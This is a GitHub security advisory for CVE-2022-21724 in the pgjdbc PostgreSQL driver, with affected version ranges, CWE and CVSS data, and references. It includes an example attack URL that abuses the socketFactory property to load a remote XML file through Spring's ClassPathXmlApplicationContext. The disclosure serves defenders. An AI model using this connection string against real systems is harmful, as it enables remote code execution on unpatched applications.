ghsa-v7wg-cpwc-24m4
Vulnerability from github
Published
2022-02-02 00:04
Modified
2022-08-12 13:14
Severity ?
Summary
pgjdbc Does Not Check Class Instantiation when providing Plugin Classes
Details
Impact
pgjdbc instantiates plugin instances based on class names provided via authenticationPluginClassName
, sslhostnameverifier
, socketFactory
, sslfactory
, sslpasswordcallback
connection properties.
However, the driver did not verify if the class implements the expected interface before instantiating the class.
Here's an example attack using an out-of-the-box class from Spring Framework:
DriverManager.getConnection("jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml");
The first impacted version is REL9.4.1208 (it introduced socketFactory
connection property)
{ "affected": [ { "package": { "ecosystem": "Maven", "name": "org.postgresql:postgresql" }, "ranges": [ { "events": [ { "introduced": "9.4.1208" }, { "fixed": "42.2.25" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Maven", "name": "org.postgresql:postgresql" }, "ranges": [ { "events": [ { "introduced": "42.3.0" }, { "fixed": "42.3.2" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2022-21724" ], "database_specific": { "cwe_ids": [ "CWE-665", "CWE-668", "CWE-74" ], "github_reviewed": true, "github_reviewed_at": "2022-02-01T22:40:00Z", "nvd_published_at": "2022-02-02T12:15:00Z", "severity": "HIGH" }, "details": "### Impact\n\npgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties.\n\nHowever, the driver did not verify if the class implements the expected interface before instantiating the class.\n\nHere\u0027s an example attack using an out-of-the-box class from Spring Framework:\n\n```\nDriverManager.getConnection(\"jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext\u0026socketFactoryArg=http://target/exp.xml\");\n```\n\nThe first impacted version is REL9.4.1208 (it introduced `socketFactory` connection property)", "id": "GHSA-v7wg-cpwc-24m4", "modified": "2022-08-12T13:14:09Z", "published": "2022-02-02T00:04:20Z", "references": [ { "type": "WEB", "url": "https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-v7wg-cpwc-24m4" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-21724" }, { "type": "WEB", "url": "https://github.com/pgjdbc/pgjdbc/commit/f4d0ed69c0b3aae8531d83d6af4c57f22312c813" }, { "type": "PACKAGE", "url": "https://github.com/pgjdbc/pgjdbc" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00027.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BVEO7BEFXPBVHSPYL3YKQWZI6DYXQLFS" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220311-0005" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5196" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "type": "CVSS_V3" } ], "summary": "pgjdbc Does Not Check Class Instantiation when providing Plugin Classes" }
Loading...
Loading...
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.